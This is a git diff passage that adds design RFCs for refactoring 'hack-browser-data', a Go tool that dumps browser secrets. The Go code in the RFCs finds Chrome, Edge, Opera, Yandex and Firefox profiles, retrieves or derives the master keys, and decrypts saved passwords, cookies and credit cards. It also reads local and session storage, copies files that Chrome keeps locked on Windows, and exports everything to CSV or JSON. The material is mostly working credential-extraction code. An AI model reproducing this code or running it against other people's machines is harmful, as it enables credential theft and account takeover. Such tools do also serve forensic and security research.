+	// Retrieve master key ONCE for the entire browser, shared across all profiles.
+	localStatePath := filepath.Join(userDataDir, "Local State")
+	retriever := platformKeyRetriever() // returns ChainRetriever per platform
+	masterKey, err := retriever.RetrieveKey(cfg.Storage, localStatePath)
+	if err != nil { return nil, fmt.Errorf("retrieve master key: %w", err) }
+
+	// ... discover profiles, create Chromium instances with masterKey + sources + overrides
+}
+```
+
+Extract methods contain no variant-specific branches; the only conditional is the generic override lookup. All variant differences are concentrated in the source and override maps and are wired in `New()`. The master key is retrieved once and injected into every `Chromium` instance (one per profile).
+
+---
+
+## 6. Error Handling
+
+### 6.1 Collect-and-continue pattern
+
+`Extract()` collects errors per category but continues extracting. The returned `data` and `err` can both be non-nil:
+
+```go
+func (c *Chromium) Extract(categories []types.Category) (*browserdata.BrowserData, error) {
+	session, err := filemanager.NewSession()
+	if err != nil { return nil, err }
+	defer session.Cleanup()
+
+	files := c.acquireFiles(session, categories)
+
+	data := &browserdata.BrowserData{}
+	var errs []error
+
+	for _, cat := range categories {
+		path, ok := files[cat]
+		if !ok { continue }
+
+		// c.masterKey was retrieved once in New() and stored on the struct.
+		switch cat {
+		case types.Password:
+			data.Passwords, err = c.extractPasswords(c.masterKey, path)
+		case types.Cookie:
+			data.Cookies, err = c.extractCookies(c.masterKey, path)
+		case types.History:
+			data.Histories, err = c.extractHistories(path)
+		case types.Download:
+			data.Downloads, err = c.extractDownloads(path)
+		case types.Bookmark:
+			data.Bookmarks, err = c.extractBookmarks(path)
+		case types.CreditCard:
+			data.CreditCards, err = c.extractCreditCards(c.masterKey, path)
+		case types.Extension:
+			data.Extensions, err = c.extractExtensions(path)
+		case types.LocalStorage:
+			data.LocalStorage, err = c.extractLocalStorage(path)
+		case types.SessionStorage:
+			data.SessionStorage, err = c.extractSessionStorage(path)
+		}
+		if err != nil {
+			log.Debugf("extract %s: %v", cat, err)
+			errs = append(errs, fmt.Errorf("%s: %w", cat, err))
+		}
+	}
+	return data, errors.Join(errs...)
// Go 1.20 +} +``` + +### 6.2 Error severity levels + +| Level | Behavior | Example | +|-------|----------|---------| +| Session/key failure | `return nil, err` — abort entirely | Disk full, keychain denied | +| Category failure | Log, skip, continue next category | Cookie file locked | +| Single record failure | Skip record, continue extraction | One cookie decryption failed | + +### 6.3 Error wrapping convention + +Use `fmt.Errorf` with `%w` for error context. No custom error types needed. + +```go +// Good: wraps with context +raw, err := base64.StdEncoding.DecodeString(encoded) +if err != nil { return nil, fmt.Errorf("base64 decode: %w", err) } + +// Bad: swallows error +raw, _ := base64.StdEncoding.DecodeString(encoded) +``` + +The `%w` verb preserves the error chain for `errors.Is()` and `errors.As()` if needed later. + +### 6.4 Caller pattern + +```go +data, err := b.Extract(categories) +if err != nil { + log.Warnf("%s: %v", b.Name(), err) // partial failure +} +if data == nil { + continue // total failure +} +data.Output(dir, b.Name(), format) // output whatever succeeded +``` + +--- + +## 7. 
Implementation Order + +| Phase | Scope | Risk | +|-------|-------|------| +| 1 | `types/category.go` + `types/models.go` + `browserdata/browserdata.go` | Zero — new files only | +| 2 | `browserdata/datautil/sqlite.go` + `decrypt.go` | Zero — new files only | +| 3 | `crypto/version.go`, rename `AESCBCDecrypt` | Low — internal crypto changes | +| 4 | `crypto/keyretriever/` | Low — new package | +| 5 | `browser/chromium/source.go` + `extract_*.go` | Medium — new extract methods | +| 6 | `browser/firefox/source.go` + `extract_*.go` | Medium — new extract methods | +| 7 | `filemanager/session.go` | Low — new package | +| 8 | Wire `Extract()` + `Config` + `PickBrowsers()` | High — connects everything | +| 9 | Delete old code: `extractor/`, `browserdata/*/`, `imports.go` | High — removal | +| 10 | Update CLI, tests, cross-platform build verification | Medium | + +--- + +## 8. Relationship with RFC-002 + +| Area | RFC-001 (this doc) | RFC-002 | +|------|-------------------|---------| +| Data model (Category + *Entry) | defines | uses | +| BrowserData container | defines | implements Output | +| Cipher version | covered | — | +| Master key retrieval | covered | — | +| Browser registration | covered | — | +| Yandex variant | covered | — | +| Error handling pattern | covered | — | +| Extract() orchestration | covered | — | +| File source mapping | — | covered | +| File acquisition (Session) | — | covered | +| Extract method details | — | covered | +| datautil helpers | — | covered | +| Output implementation | — | covered | + +--- + +## 9. Open Questions + +1. **App-Bound Encryption (Chrome 127+ v20)**: `crypto/version.go` has the extension point. Implementation deferred until tested. +2. **Firefox version detection**: is the key-length heuristic in `processMasterKey()` sufficient, or formalize it? +3. **Sort direction**: standardize all categories to DESC by date? 
(Firefox history/download currently ASC) + +--- + +## References + +- [Chromium OS Crypt](https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/) +- [Chrome Password Decryption](https://github.com/chromium/chromium/blob/main/components/os_crypt/sync/os_crypt_win.cc) +- [Firefox NSS](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS) diff --git a/rfcs/002-browserdata-and-file-acquisition-refactoring.md b/rfcs/002-browserdata-and-file-acquisition-refactoring.md new file mode 100644 index 0000000..0c269d9 --- /dev/null +++ b/rfcs/002-browserdata-and-file-acquisition-refactoring.md @@ -0,0 +1,843 @@ +# RFC-002: Data Extraction & File Acquisition + +**Author**: moonD4rk +**Status**: Proposed +**Created**: 2026-03-14 +**Updated**: 2026-03-22 + +## Abstract + +This RFC covers the implementation details of data extraction and file acquisition: + +1. **File source mapping**: how each browser engine maps categories to files +2. **File acquisition**: Session-based temp file management with deduplication +3. **Extract methods**: concrete implementations for each data category +4. **Shared helpers**: `QuerySQLite()` and `DecryptChromiumValue()` +5. **Output**: writing `Extract` results to CSV/JSON files + +**Constraint**: Go 1.20 (Windows 7 support). + +See RFC-001 for data model (`Category` + `*Entry` types), crypto layer, browser registration, and Yandex variant design. + +--- + +## 1. 
Data Flow + +``` +CLI: main.go + │ + ▼ +browser.PickBrowsers("all", "") + │ + │ platformBrowsers() → []Config + │ → chromium.New(cfg, dir) / firefox.New(dir) + ▼ +Browser.Extract(categories) + │ + ├─ filemanager.NewSession() + │ └─ acquireFiles() with dedup → map[Category]tempPath + │ + ├─ masterKey + │ Chromium: keyretriever.RetrieveKey(storage) + │ Firefox: deriveMasterKey(key4dbPath) + │ + └─ per-category extract methods + ├─ c.extractPasswords(masterKey, path) → []LoginEntry + ├─ c.extractCookies(masterKey, path) → []CookieEntry + ├─ c.extractHistories(path) → []HistoryEntry + ├─ c.extractDownloads(path) → []DownloadEntry + ├─ c.extractBookmarks(path) → []BookmarkEntry + ├─ c.extractCreditCards(masterKey, path) → []CreditCardEntry + ├─ c.extractExtensions(path) → []ExtensionEntry + ├─ c.extractLocalStorage(path) → []StorageEntry (LevelDB) + └─ c.extractSessionStorage(path) → []StorageEntry (LevelDB) + │ + ▼ + browserdata.BrowserData{Passwords: [...], Cookies: [...], ...} + │ + ▼ + BrowserData.Output(dir, name, format) + │ + ▼ + chrome_default_password.csv + chrome_default_cookie.json + ... +``` + +--- + +## 2. 
File Source Mapping + +### 2.1 Category → source (one flat map per engine) + +```go +// browser/chromium/source.go + +type source struct { + paths []string // candidates in priority order + isDir bool +} + +var chromiumSources = map[types.Category]source{ + types.Password: {paths: []string{"Login Data"}}, + types.Cookie: {paths: []string{"Network/Cookies", "Cookies"}}, + types.History: {paths: []string{"History"}}, + types.Download: {paths: []string{"History"}}, // same file, different query + types.Bookmark: {paths: []string{"Bookmarks"}}, + types.CreditCard: {paths: []string{"Web Data"}}, + types.Extension: {paths: []string{"Secure Preferences"}}, + types.LocalStorage: {paths: []string{"Local Storage/leveldb"}, isDir: true}, + types.SessionStorage: {paths: []string{"Session Storage"}, isDir: true}, +} +``` + +```go +// browser/firefox/source.go + +var firefoxSources = map[types.Category]source{ + types.Password: {paths: []string{"logins.json"}}, + types.Cookie: {paths: []string{"cookies.sqlite"}}, + types.History: {paths: []string{"places.sqlite"}}, + types.Download: {paths: []string{"places.sqlite"}}, // same file + types.Bookmark: {paths: []string{"places.sqlite"}}, // same file + types.Extension: {paths: []string{"extensions.json"}}, + types.LocalStorage: {paths: []string{"webappsstore.sqlite"}}, +} +``` + +Yandex source map defined in RFC-001 Section 5. + +### 2.2 File acquisition with deduplication + +When multiple categories map to the same file (e.g. 
History + Download), the file is copied once: + +```go +func (c *Chromium) acquireFiles(session *filemanager.Session, categories []types.Category) map[types.Category]string { + result := make(map[types.Category]string) + copied := make(map[string]string) // abs src → temp dst + + for _, cat := range categories { + src, ok := c.sources[cat] // uses c.sources (chromiumSources or yandexSources) + if !ok { continue } + + for _, rel := range src.paths { + abs := filepath.Join(c.profileDir, rel) + + if dst, ok := copied[abs]; ok { + result[cat] = dst // reuse already-copied file + break + } + + dst := filepath.Join(session.TempDir(), filepath.Base(rel)) + if err := session.Acquire(abs, dst, src.isDir); err == nil { + copied[abs] = dst + result[cat] = dst + break + } + } + } + return result +} +``` + +### 2.3 Firefox key4.db: infrastructure, not a Category + +Each Firefox profile has its own `key4.db`. The master key is derived once in `New()` and stored on the struct, so `Extract()` never re-derives it: + +```go +// firefox.New(): called once per profile +func New(profileDir string) (*Firefox, error) { + // derive master key from this profile's key4.db + keyPath := filepath.Join(profileDir, "key4.db") + masterKey, err := deriveMasterKey(keyPath) + if err != nil { return nil, err } + + return &Firefox{ + profileDir: profileDir, + masterKey: masterKey, + sources: firefoxSources, + }, nil +} + +func (f *Firefox) Extract(categories []types.Category) (*browserdata.BrowserData, error) { + // A failed session means no temp dir to copy into: abort, as Chromium.Extract does. + session, err := filemanager.NewSession() + if err != nil { return nil, err } + defer session.Cleanup() + + files := f.acquireFiles(session, categories) + + // masterKey was derived in New() from this profile's key4.db + data := &browserdata.BrowserData{} + // ... extract each category using f.masterKey ...
+} +``` + +### 2.4 Profile Discovery + +Profile discovery functions are pure helpers (no struct receiver) that scan the filesystem: + +```go +// profile/finder.go + +// discoverProfiles returns sub-directory names that look like Chrome profiles. +// Matches "Default" or any name starting with "Profile ". +// Falls back to ["."] for Opera-style layouts (data files live directly in userDataDir). +func discoverProfiles(userDataDir string) []string { + entries, err := os.ReadDir(userDataDir) + if err != nil { return []string{"."} } + + var profiles []string + for _, e := range entries { + if !e.IsDir() { continue } + name := e.Name() + if name == "Default" || strings.HasPrefix(name, "Profile ") { + profiles = append(profiles, name) + } + } + if len(profiles) == 0 { + return []string{"."} + } + return profiles +} + +// discoverDataFiles checks which categories have actual data files in profileDir. +func discoverDataFiles(profileDir string, sources map[types.Category]source) map[types.Category]string { + found := make(map[types.Category]string) + for cat, src := range sources { + for _, rel := range src.paths { + abs := filepath.Join(profileDir, rel) + info, err := os.Stat(abs) + if err != nil { continue } + if src.isDir && !info.IsDir() { continue } + if !src.isDir && info.IsDir() { continue } + found[cat] = abs + break + } + } + return found +} + +// isValidBrowserDir checks whether the directory belongs to a real browser install. +// Chromium: requires "Local State" file. Firefox: requires directory existence. 
+func isValidBrowserDir(kind BrowserKind, dir string) bool { // argument order matches the call in PickBrowsers (RFC-001 Section 4) + switch kind { + case KindChromium, KindChromiumYandex: + _, err := os.Stat(filepath.Join(dir, "Local State")) + return err == nil + case KindFirefox: + info, err := os.Stat(dir) + return err == nil && info.IsDir() + } + return false +} +``` + +**Testing approach**: all three functions are pure filesystem operations, easily testable with `t.TempDir()`: + +```go +func TestDiscoverProfiles(t *testing.T) { + dir := t.TempDir() + os.MkdirAll(filepath.Join(dir, "Default"), 0o755) + os.MkdirAll(filepath.Join(dir, "Profile 1"), 0o755) + os.MkdirAll(filepath.Join(dir, "System Profile"), 0o755) + + profiles := discoverProfiles(dir) + assert.Equal(t, []string{"Default", "Profile 1"}, profiles) +} + +func TestDiscoverDataFiles(t *testing.T) { + dir := t.TempDir() + os.WriteFile(filepath.Join(dir, "Login Data"), []byte{}, 0o644) + os.MkdirAll(filepath.Join(dir, "Network"), 0o755) + os.WriteFile(filepath.Join(dir, "Network", "Cookies"), []byte{}, 0o644) + + files := discoverDataFiles(dir, chromiumSources) + assert.Contains(t, files, types.Password) + assert.Contains(t, files, types.Cookie) +} + +func TestAcquireFiles_Dedup(t *testing.T) { + dir := t.TempDir() + os.WriteFile(filepath.Join(dir, "History"), []byte("data"), 0o644) + + session, _ := filemanager.NewSession() + defer session.Cleanup() + + c := &Chromium{profileDir: dir, sources: chromiumSources} + files := c.acquireFiles(session, []types.Category{types.History, types.Download}) + assert.Equal(t, files[types.History], files[types.Download]) +} +``` + +### 2.5 Platform Config Example + +Each platform file returns the full list of known browsers with their `UserDataDir` paths: + +```go +// browser/browser_windows.go +func platformBrowsers() []Config { + return []Config{ + {Key: "chrome", Name: "Chrome", Kind: KindChromium, UserDataDir: homeDir + "/AppData/Local/Google/Chrome/User Data"}, + {Key: "edge", Name: "Microsoft Edge", Kind: KindChromium, UserDataDir:
homeDir + "/AppData/Local/Microsoft/Edge/User Data"}, + {Key: "opera", Name: "Opera", Kind: KindChromium, UserDataDir: homeDir + "/AppData/Roaming/Opera Software/Opera Stable"}, + {Key: "yandex", Name: "Yandex", Kind: KindChromiumYandex, UserDataDir: homeDir + "/AppData/Local/Yandex/YandexBrowser/User Data"}, + {Key: "firefox", Name: "Firefox", Kind: KindFirefox, UserDataDir: homeDir + "/AppData/Roaming/Mozilla/Firefox/Profiles"}, + } +} +``` + +`PickBrowsers()` iterates this list, calls `isValidBrowserDir()` to skip browsers that aren't installed, then calls `discoverProfiles()` to find all profiles within valid browser directories. + +--- + +## 3. Shared Helpers: `browserdata/datautil/` + +### 3.1 SQLite query helper + +```go +// browserdata/datautil/sqlite.go + +func QuerySQLite(dbPath string, journalOff bool, query string, scanFn func(*sql.Rows) error) error { + db, err := sql.Open("sqlite", dbPath) + if err != nil { return err } + defer db.Close() + + if journalOff { + if _, err := db.Exec("PRAGMA journal_mode=off"); err != nil { return err } + } + + rows, err := db.Query(query) + if err != nil { return err } + defer rows.Close() + + for rows.Next() { + if err := scanFn(rows); err != nil { + log.Debugf("scan row error: %v", err) + continue // skip bad row, continue extraction + } + } + return rows.Err() +} +``` + +### 3.2 Generic query helper: `datautil/query.go` + +```go +package datautil + +// QueryRows is a generic helper (Go 1.20) that wraps QuerySQLite +// and collects results into a typed slice. Each extract method +// only needs to provide the scan function.
+func QueryRows[T any](path string, journalOff bool, query string, scanRow func(*sql.Rows) (T, error)) ([]T, error) { + var items []T + err := QuerySQLite(path, journalOff, query, func(rows *sql.Rows) error { + item, err := scanRow(rows) + if err != nil { return nil } // skip bad row + items = append(items, item) + return nil + }) + return items, err +} +``` + +### 3.3 Chromium decrypt helper + +```go +// browserdata/datautil/decrypt.go + +func DecryptChromiumValue(masterKey, encrypted []byte) ([]byte, error) { + if len(encrypted) == 0 { return nil, nil } + if len(masterKey) == 0 { + return crypto.DecryptWithDPAPI(encrypted) + } + value, err := crypto.DecryptWithDPAPI(encrypted) + if err != nil { + value, err = crypto.DecryptWithChromium(masterKey, encrypted) + } + return value, err +} +``` + +--- + +## 4. Extract Method Examples + +Each extract method lives in its own `extract_*.go` file inside the browser engine package (see RFC-001 for naming convention). The default SQL query is a `const` in the same file. Override is checked via `c.queryOverrides`. 
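
The examples in this section call `c.query(cat)`, which neither RFC defines. A minimal sketch of what such a helper might look like follows. It assumes a hypothetical per-category `defaultQueries` table (the RFC itself keeps each default as a `const` beside its extract method) and uses a stand-in `Category` type in place of `types.Category`:

```go
package main

// Category stands in for types.Category from RFC-001 (assumed to be a small enum).
type Category int

const (
	Password Category = iota
	Cookie
)

// defaultQueries is a hypothetical lookup table used only for this sketch.
// The query strings are copied from the defaults shown in this RFC.
var defaultQueries = map[Category]string{
	Password: `SELECT origin_url, username_value, password_value, date_created FROM logins`,
	Cookie: `SELECT name, encrypted_value, host_key, path, ` +
		`creation_utc, expires_utc, is_secure, is_httponly, ` +
		`has_expires, is_persistent FROM cookies`,
}

// Chromium mirrors only the field that matters for query selection.
type Chromium struct {
	queryOverrides map[Category]string // nil for standard Chromium
}

// query returns the variant-specific override for cat when one is set,
// and falls back to the default query otherwise.
func (c *Chromium) query(cat Category) string {
	if q, ok := c.queryOverrides[cat]; ok {
		return q
	}
	return defaultQueries[cat]
}
```

Indexing a nil map is safe in Go, so standard Chromium instances can leave `queryOverrides` unset and still get the defaults; only the Yandex wiring in `New()` needs to populate it.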
+ +### 4.1 Chromium password (SQLite + decryption) + +```go +// browser/chromium/extract_password.go + +const defaultLoginQuery = `SELECT origin_url, username_value, password_value, date_created FROM logins` + +func (c *Chromium) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) { + logins, err := datautil.QueryRows(path, false, c.query(types.Password), + func(rows *sql.Rows) (types.LoginEntry, error) { + var url, username string + var pwd []byte + var created int64 + if err := rows.Scan(&url, &username, &pwd, &created); err != nil { + return types.LoginEntry{}, err + } + password, _ := datautil.DecryptChromiumValue(masterKey, pwd) + return types.LoginEntry{ + URL: url, + Username: username, + Password: string(password), + CreatedAt: typeutil.TimeEpoch(created), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(logins, func(i, j int) bool { + return logins[i].CreatedAt.After(logins[j].CreatedAt) + }) + return logins, nil +} +``` + +### 4.2 Chromium cookie (SQLite + decryption) + +```go +// browser/chromium/extract_cookie.go + +const defaultCookieQuery = `SELECT name, encrypted_value, host_key, path, + creation_utc, expires_utc, is_secure, is_httponly, + has_expires, is_persistent FROM cookies` + +func (c *Chromium) extractCookies(masterKey []byte, path string) ([]types.CookieEntry, error) { + cookies, err := datautil.QueryRows(path, false, c.query(types.Cookie), + func(rows *sql.Rows) (types.CookieEntry, error) { + var ( + name, host, path string + isSecure, isHTTPOnly, hasExpire, isPersistent int + createdAt, expireAt int64 + encryptedValue []byte + ) + if err := rows.Scan(&name, &encryptedValue, &host, &path, + &createdAt, &expireAt, &isSecure, &isHTTPOnly, + &hasExpire, &isPersistent); err != nil { + return types.CookieEntry{}, err + } + + value, _ := datautil.DecryptChromiumValue(masterKey, encryptedValue) + return types.CookieEntry{ + Name: name, + Host: host, + Path: path, + Value: string(value), + IsSecure: isSecure 
!= 0, + IsHTTPOnly: isHTTPOnly != 0, + ExpireAt: typeutil.TimeEpoch(expireAt), + CreatedAt: typeutil.TimeEpoch(createdAt), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(cookies, func(i, j int) bool { + return cookies[i].CreatedAt.After(cookies[j].CreatedAt) + }) + return cookies, nil +} +``` + +### 4.3 Firefox password (JSON + `decryptPBE()` helper) + +Firefox uses `decryptPBE()` to combine the 3-step pipeline (base64 decode -> ASN1 PBE parse -> decrypt) into one call, reducing 6 error checks to 2. + +```go +// browser/firefox/extract_password.go + +// decryptPBE combines base64 decode + ASN1 PBE parse + decrypt. +func decryptPBE(encoded string, masterKey []byte) ([]byte, error) { + raw, err := base64.StdEncoding.DecodeString(encoded) + if err != nil { return nil, fmt.Errorf("base64 decode: %w", err) } + pbe, err := crypto.NewASN1PBE(raw) + if err != nil { return nil, fmt.Errorf("parse asn1 pbe: %w", err) } + plaintext, err := pbe.Decrypt(masterKey) + if err != nil { return nil, fmt.Errorf("decrypt: %w", err) } + return plaintext, nil +} + +func (f *Firefox) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) { + data, err := os.ReadFile(path) + if err != nil { return nil, err } + + var logins []types.LoginEntry + for _, v := range gjson.GetBytes(data, "logins").Array() { + user, err := decryptPBE(v.Get("encryptedUsername").String(), masterKey) + if err != nil { + log.Debugf("decrypt username: %v", err) + continue + } + pwd, err := decryptPBE(v.Get("encryptedPassword").String(), masterKey) + if err != nil { + log.Debugf("decrypt password: %v", err) + continue + } + + url := v.Get("formSubmitURL").String() + if url == "" { url = v.Get("hostname").String() } + + logins = append(logins, types.LoginEntry{ + URL: url, + Username: string(user), + Password: string(pwd), + CreatedAt: typeutil.TimeStamp(v.Get("timeCreated").Int() / 1000), + }) + } + + sort.Slice(logins, func(i, j int) bool { + return 
logins[i].CreatedAt.After(logins[j].CreatedAt) + }) + return logins, nil +} +``` + +### 4.4 Firefox cookie (SQLite, no encryption) + +```go +// browser/firefox/extract_cookie.go + +const firefoxCookieQuery = `SELECT name, value, host, path, + creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies` + +func (f *Firefox) extractCookies(path string) ([]types.CookieEntry, error) { + cookies, err := datautil.QueryRows(path, true, firefoxCookieQuery, + func(rows *sql.Rows) (types.CookieEntry, error) { + var ( + name, value, host, path string + isSecure, isHTTPOnly int + createdAt, expiry int64 + ) + if err := rows.Scan(&name, &value, &host, &path, + &createdAt, &expiry, &isSecure, &isHTTPOnly); err != nil { + return types.CookieEntry{}, err + } + return types.CookieEntry{ + Name: name, + Host: host, + Path: path, + Value: value, // not encrypted + IsSecure: isSecure != 0, + IsHTTPOnly: isHTTPOnly != 0, + ExpireAt: typeutil.TimeStamp(expiry), + CreatedAt: typeutil.TimeStamp(createdAt / 1000000), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(cookies, func(i, j int) bool { + return cookies[i].CreatedAt.After(cookies[j].CreatedAt) + }) + return cookies, nil +} +``` + +### 4.5 Chromium local storage (LevelDB) + +```go +// browser/chromium/extract_storage.go + +func (c *Chromium) extractLocalStorage(path string) ([]types.StorageEntry, error) { + db, err := leveldb.OpenFile(path, nil) + if err != nil { return nil, err } + defer db.Close() + + var entries []types.StorageEntry + iter := db.NewIterator(nil, nil) + defer iter.Release() + + for iter.Next() { + url, name := parseStorageKey(iter.Key(), []byte{0}) // \x00 separator + if url == "" { continue } + entries = append(entries, types.StorageEntry{ + URL: url, + Key: name, + Value: string(iter.Value()), + }) + } + return entries, iter.Error() +} + +func (c *Chromium) extractSessionStorage(path string) ([]types.StorageEntry, error) { + db, err := leveldb.OpenFile(path, nil) + if err != nil { return nil, 
err } + defer db.Close() + + var entries []types.StorageEntry + iter := db.NewIterator(nil, nil) + defer iter.Release() + + for iter.Next() { + url, name := parseStorageKey(iter.Key(), []byte("-")) // "-" separator + if url == "" { continue } + entries = append(entries, types.StorageEntry{ + URL: url, + Key: name, + Value: string(iter.Value()), + }) + } + return entries, iter.Error() +} + +func parseStorageKey(key []byte, separator []byte) (url, name string) { + parts := bytes.SplitN(key, separator, 2) + if len(parts) != 2 { return "", "" } + return string(parts[0]), string(parts[1]) +} +``` + +### 4.6 Key differences between engines + +| Aspect | Chromium | Firefox | +|--------|----------|---------| +| Password source | SQLite (`Login Data`) | JSON (`logins.json`) | +| Password decryption | DPAPI → AES-GCM/CBC | ASN1PBE | +| Cookie encryption | Yes (masterKey needed) | No (plaintext) | +| Cookie journal_mode | Not needed | `PRAGMA journal_mode=off` | +| Time format | WebKit epoch (`TimeEpoch`) | Unix microseconds (`TimeStamp / 1e6`) | +| Storage format | LevelDB directory | SQLite (`webappsstore.sqlite`) | +| key4.db | Not used | Required for master key derivation | +| masterKey parameter | Passed to password, cookie, creditcard | Passed to password only | + +### 4.7 Error handling in extract methods + +Three-level rule: + +| Level | Action | Example | +|-------|--------|---------| +| File/DB open failure | `return nil, err` | `os.ReadFile` fails, `sql.Open` fails | +| Single record failure | `log.Debugf` + `continue` | One password decryption failed | +| Entire Category failure | Collected into `errs` by caller | Cookie file locked | + +Extract methods only `return error` for file-level failures. Record-level failures are logged at Debug level and skipped. The caller (`Extract()`) collects per-category errors with `errors.Join`. + +Error wrapping uses `fmt.Errorf("context: %w", err)` — no custom error types. + +--- + +## 5. 
File Acquisition Layer + +### 5.1 Session manager + +```go +// filemanager/session.go + +type Session struct { + tempDir string +} + +func NewSession() (*Session, error) { + dir, err := os.MkdirTemp("", "hbd-*") + if err != nil { return nil, err } + return &Session{tempDir: dir}, nil +} + +func (s *Session) TempDir() string { return s.tempDir } + +func (s *Session) Acquire(src, dst string, isDir bool) error { + if isDir { + return fileutil.CopyDir(src, dst, "lock") + } + // Try normal copy first + err := fileutil.CopyFile(src, dst) + if err != nil { + // Normal copy failed (file may be locked), try platform-specific method + if err2 := copyLocked(src, dst); err2 != nil { + return fmt.Errorf("copy %s: %w; locked copy: %v", src, err, err2) + } + } + // Copy SQLite WAL/SHM companion files if present + for _, suffix := range []string{"-wal", "-shm"} { + if fileutil.IsFileExists(src + suffix) { + _ = fileutil.CopyFile(src+suffix, dst+suffix) + } + } + return nil +} + +func (s *Session) Cleanup() { + os.RemoveAll(s.tempDir) +} +``` + +### 5.2 Locked file handling (Windows) + +On Windows, Chrome locks Cookie files while running. `Session.Acquire()` falls back to `copyLocked()` which uses `syscall.CreateFile` with `FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE` flags to bypass exclusive locks. + +Platform-specific files: +- `filemanager/copy_windows.go` — `copyLocked()` with sharing flags +- `filemanager/copy_other.go` — stub returning error + +This is transparent to callers — browser extract methods never know whether a file was copied normally or via the locked-file path. + +### 5.3 Acquirer interface (deferred) + +If only `CopyAcquirer` is needed, `Session.Acquire()` handles it directly. The `Acquirer` interface can be introduced later when VSS or other strategies are needed. + +--- + +## 6. 
Output + +```go +// browserdata/output.go + +func (d *BrowserData) Output(dir, browserName, format string) error { + items := []struct { + name string + data interface{} + len int + }{ + {"password", d.Passwords, len(d.Passwords)}, + {"cookie", d.Cookies, len(d.Cookies)}, + {"bookmark", d.Bookmarks, len(d.Bookmarks)}, + {"history", d.Histories, len(d.Histories)}, + {"download", d.Downloads, len(d.Downloads)}, + {"creditcard", d.CreditCards, len(d.CreditCards)}, + {"extension", d.Extensions, len(d.Extensions)}, + {"localstorage", d.LocalStorage, len(d.LocalStorage)}, + {"sessionstorage", d.SessionStorage, len(d.SessionStorage)}, + } + + var errs []error + for _, item := range items { + if item.len == 0 { continue } + filename := formatFilename(browserName, item.name, format) + if err := writeFile(dir, filename, format, item.data); err != nil { + errs = append(errs, fmt.Errorf("write %s: %w", filename, err)) + continue + } + log.Infof("exported: %s (%d items)", filename, item.len) + } + return errors.Join(errs...) 
+} + +func writeFile(dir, filename, format string, data interface{}) error { + if dir != "" { + if err := os.MkdirAll(dir, 0o750); err != nil { return err } + } + path := filepath.Join(dir, filename) + f, err := os.OpenFile(path, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0o600) + if err != nil { return err } + defer f.Close() + + switch format { + case "json": + return writeJSON(f, data) + default: + return writeCSV(f, data) + } +} + +func writeJSON(w io.Writer, data interface{}) error { + enc := json.NewEncoder(w) + enc.SetIndent("", " ") + enc.SetEscapeHTML(false) + return enc.Encode(data) +} + +func writeCSV(w io.Writer, data interface{}) error { + // UTF-8 BOM (3 bytes); replaces the golang.org/x/text dependency + if _, err := w.Write([]byte{0xEF, 0xBB, 0xBF}); err != nil { return err } + csvWriter := csv.NewWriter(w) + return gocsv.MarshalCSV(data, gocsv.NewSafeCSVWriter(csvWriter)) +} + +func formatFilename(browserName, dataName, format string) string { + r := strings.NewReplacer(" ", "_", ".", "_", "-", "_") + ext := "csv" + if format == "json" { ext = "json" } + return strings.ToLower(fmt.Sprintf("%s_%s.%s", r.Replace(browserName), dataName, ext)) +} +``` + +--- + +## 7. What Was Eliminated + +| Before | After | Why | +|--------|-------|-----| +| `extractor/` package (interface + registry + factory) | Deleted | Browser engines have typed extract methods | +| `browserdata/password/`, `cookie/`, etc.
(9 sub-packages) | Deleted | Extract logic moved into `browser/chromium/` and `browser/firefox/` | +| `browserdata/imports.go` | Deleted | No init() registration needed | +| `types.DataType` (22 iota constants) | `types.Category` (9 constants) | No browser prefix, no key types | +| `itemFileNames` map | `chromiumSources` / `firefoxSources` per engine | File layout is engine-internal | +| `TempFilename()` on DataType | `Session.TempDir()` + `filepath.Base()` | Session manages temp paths | +| `DefaultChromiumTypes`, `DefaultFirefoxTypes`, `DefaultYandexTypes` | `types.AllCategories` | One list for all engines | +| `loginData.encryptPass`, `cookie.encryptValue` | Local variables in extract methods | Encrypted fields don't belong in data models | +| 20 trivial `Name()` / `Len()` methods | Not needed | No Extractor interface | + +--- + +## 8. Implementation Plan + +### Phase 1: Foundation (new files only, zero risk) + +1. `types/category.go` — Category enum +2. `types/models.go` — all *Entry structs +3. `browserdata/browserdata.go` — BrowserData struct +4. `browserdata/datautil/sqlite.go` — QuerySQLite() +5. `browserdata/datautil/decrypt.go` — DecryptChromiumValue() +6. `filemanager/session.go` — Session + +### Phase 2: Extract methods (new files, coexist with old code) + +1. `browser/chromium/source.go` — chromiumSources, yandexSources +2. `browser/chromium/extract_*.go` — all 9 extract methods +3. `browser/firefox/source.go` — firefoxSources +4. `browser/firefox/extract_*.go` — all extract methods + +### Phase 3: Wiring (modify existing files) + +1. Update `Chromium.Extract()` to use new extract methods +2. Update `Firefox.Extract()` to use new extract methods +3. Update `Config` and `PickBrowsers()` +4. Update `browserdata/output.go` +5. Update CLI `main.go` + +### Phase 4: Cleanup (delete old code) + +1. Delete `extractor/` package +2. Delete `browserdata/imports.go` +3. Delete `browserdata/password/`, `cookie/`, etc. +4. 
Delete old `types.DataType`, `itemFileNames` +5. Delete `browser/consts.go` + +### Phase 5: Verification + +```bash +go test ./... +go vet ./... +gofmt -d . +GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/ +GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/ +GOOS=darwin GOARCH=amd64 go build ./cmd/hack-browser-data/ +``` + +--- + +## 9. Open Questions + +1. **Sort direction**: standardize all categories to DESC by date? +2. **Output format**: keep `gocsv` or switch to `encoding/csv`? +3. **LevelDB key parsing**: the current `fillKey`/`fillHeader`/`fillValue` logic in localstorage is complex — how much of that detail carries over? + +--- + +## 10. Relationship with RFC-001 + +| Area | RFC-001 | RFC-002 (this doc) | +|------|---------|-------------------| +| Data model (Category + *Entry) | defines | uses | +| BrowserData container | defines | implements Output | +| Cipher version | covered | — | +| Master key retrieval | covered | — | +| Browser registration | covered | — | +| Yandex variant | covered | — | +| Error handling pattern | covered | — | +| File source mapping | — | covered | +| File acquisition | — | covered | +| Extract methods | — | covered | +| datautil helpers | — | covered | +| Output | — | 